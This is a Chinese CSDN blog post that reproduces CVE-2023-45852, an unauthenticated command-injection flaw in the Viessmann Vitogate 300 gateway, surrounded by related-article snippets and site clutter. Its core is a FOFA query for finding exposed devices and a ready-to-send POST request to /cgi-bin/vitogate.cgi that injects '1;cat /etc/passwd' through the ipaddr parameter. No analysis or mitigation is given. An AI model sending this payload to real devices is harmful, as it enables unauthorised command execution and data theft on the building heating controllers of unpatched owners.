Viessmann Vitogate RCE漏洞(CVE-2023-45852)

最新推荐文章于 2024-07-08 16:37:01 发布
最新推荐文章于 2024-07-08 16:37:01 发布
阅读量453 收藏 7
点赞数 7
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64366018/article/details/135934534
版权
文章详细描述了一种针对Vitogate-300应用的漏洞利用方法,使用fafa语句构造了一个包含恶意参数的POST请求,试图访问系统文件cat/etc/passwd,展示了潜在的安全风险。
摘要由CSDN通过智能技术生成

0x01.fofa语句

app="Vitogate-300"

0x02.漏洞复现

POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: 
Content-Type: application/json
 
{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}

柯达_
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2023-45852Viessmann Vitogate远程代码执行漏洞复现【附POC】
薛定谔嘚喵博客
11-03 377
Viessmann Vitogate 300 2.1.3.0版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者绕过身份验证,并通过post方法的ipaddr参数执行任意命令。
Viessmann Vitogate RCE漏洞复现(CVE-2023-45852)
0xSec
01-23 457
Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。
Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)
weixin_44304678的博客
11-02 385
漏洞源于允许未经身份验证的攻击者绕过身份验证,并通过put方法的ipaddr参数执行任意命令。仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。Viessmann VitogateViessmann公司的一个智能化控制系统。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。### 查看用户文件。
漏洞分析|Viessmann Vitogate 远程命令执行漏洞(CVE-2023-45852)
xuandaoren的博客
11-03 190
Vitogate 300 2.1.3.0版本的/cgi-bin/vitogate.cgi存在一个未经身份验证的攻击者可利用的漏洞,通过put方法中的ipaddr params JSON数据中的shell元字符实现绕过身份验证并执行任意命令。通过分析/ugw/httpd/html/cgi-bin/vitogate.cgi,它通过HTTPPOST接受JSON格式的数据。目前官方已发布新版已经修复此漏洞,并且为受影响版本发布了补丁,建议用户尽快升级至最新版本。然后isValidSession函数检查是否已登录。
漏洞复现】Viessmann Vitogate远程代码执行(CVE-2023-45852)
失心少年
11-09 450
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。Vitogate 300 2.1.3.0版本的/cgi-bin/vitogate.cgi存在一个未经身份验证的攻击者可利用的漏洞,通过put方法中的ipaddr params JSON数据中的shell元字符实现绕过身份验证并执行任意命令。
Viessmann Vitogate RCE 漏洞(含批量验证poc)
weixin_43567873的博客
04-17 53
Viessmann Vitogate RCE 漏洞(含批量验证poc)
【传送点】上千漏洞复现复现集合 exp poc 持续更新
失心少年
11-28 4069
漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现【漏洞复现】熊海cms 存在sql注入 附poc【漏洞复现】Array VPN任意文件读取漏洞漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC【漏洞复现】DPTech VPN存在任意文件读取漏洞
菲斯曼壁挂炉24小时售后服务热线全国(viessmann壁挂锅炉售后服务电话
2401_86208609的博客
07-07 126
菲斯曼壁挂锅炉售后服务与客服热线400 9918812软件开发工程师是互联网企业中常见的岗位,从业者需要具备相关专业的学习经验,熟悉相关编程语言和算法。1、参与产品立项会议,与产品经理沟通确定软件开发需求,设计具体功能实现方案;4、编制软件开发过程中的调整记录,对开发文档进行注释;5、提供技术指导,协助相关工作人员完成用户手册的编写;2、确定软件设计方案后,完成代码编写、测试及调试;3、负责软件维护与升级工作,如发现问题需及时调整;7、完成上级交办的其他相关工作。6、协助安装及调试相关软件;
太阳能集热器行业调研报告 - 市场现状分析与发展前景预测
贝哲斯研究报告
01-18 332
【出版商】贝哲斯咨询 【免费目录下载】太阳能集热器是一种将太阳的辐射能转换为热能的设备。由于太阳能比较分散,必须设法把它集中起来,所以,集热器是各种太阳能利用设备的关键部分。 太阳能集热器市场的企业竞争态势 该报告涉及的主要国际市场参与者有GREENoneTEC、Viessmann Werke、Solectrol、Solhart、Dimas、Wolf、Prime Laser Tech、Nobel Xilinakis、BDR Thermea、Modulo Solar、Hewalex、Arist...
go-vitotrol:golang客户端库到Viessmann Vitotrol Web服务
05-21
软件包go-vitotrol可提供对Viessmann:trade_mark:Vitotrol:trade_mark:云API的访问,以控制/监视锅炉。 参见 当前仅实现我真正需要的请求: 登录 获取设备 请求刷新状态 RequestWriteStatus 获取数据 写数据 ...
viessmann-serwis-krakow.github.io
02-21
【标题】"viessmann-serwis-krakow.github.io" 指的可能是一个开源项目或个人网站的GitHub托管页面,专门针对Viessmann在克拉科夫的服务。这个项目可能包含了Viessmann产品在克拉科夫地区的服务信息、用户手册、故障...
vclient-web:Viessmann Vito 加热系统的 Web 界面
06-24
它提供了通过网络控制 Viessmann Vito 加热系统的能力。目标简单的轻的可破解在很好依赖关系Python(已随 Raspbian 一起提供) ( sudo apt-get install python-cherrypy3 ) ( sudo apt-get install python-sqlite )...
vcontrold:用于Vito通信Linux守护程序-开源
05-07
《vcontrold:连接Viessmann Vito的开源通信守护程序》 在IT行业中,智能家居设备的管理和控制已经成为一个热门话题。Viessmann是一家知名的德国暖通空调制造商,其产品线包括了各种智能供热系统。为了更好地管理和...
vcontrold:vcontrold守护程序,用于控制和记录Viessmann:registered:类型的加热设备
05-14
vcontrold是用C语言编写的软件后台驻留程序,用于与Viessmann Vito加热控制器的“ Optolink”接口进行通信。 有关构建和安装说明,请参阅doc/INSTALL.md 。 可用于不同的平台。 请访问 ,以获取详细信息和示例。 ...
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 307
亚信安全发布2024年6月威胁态势
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
最新发布
olzorange的博客
07-08 135
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
【易捷海购-注册安全分析报告】
weixin_46641057的博客
07-05 1139
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 612
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
菲斯曼Vitodens 100-W B1HF, B1KF, B1HF-M, B1KF-M安装和调试手册(英文版)
01-04
手册从安装和系统设置等均有详细说明,涉及菲斯曼壁挂炉Vitodens 100-W系列的 B1HF, B1KF( 3.2 to 32 kW),B1HF-M, B1KF-M (5.7 to 32 kW)。使用菲斯曼国内燃气壁挂炉型号B1KF的用户可以参考阅读。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值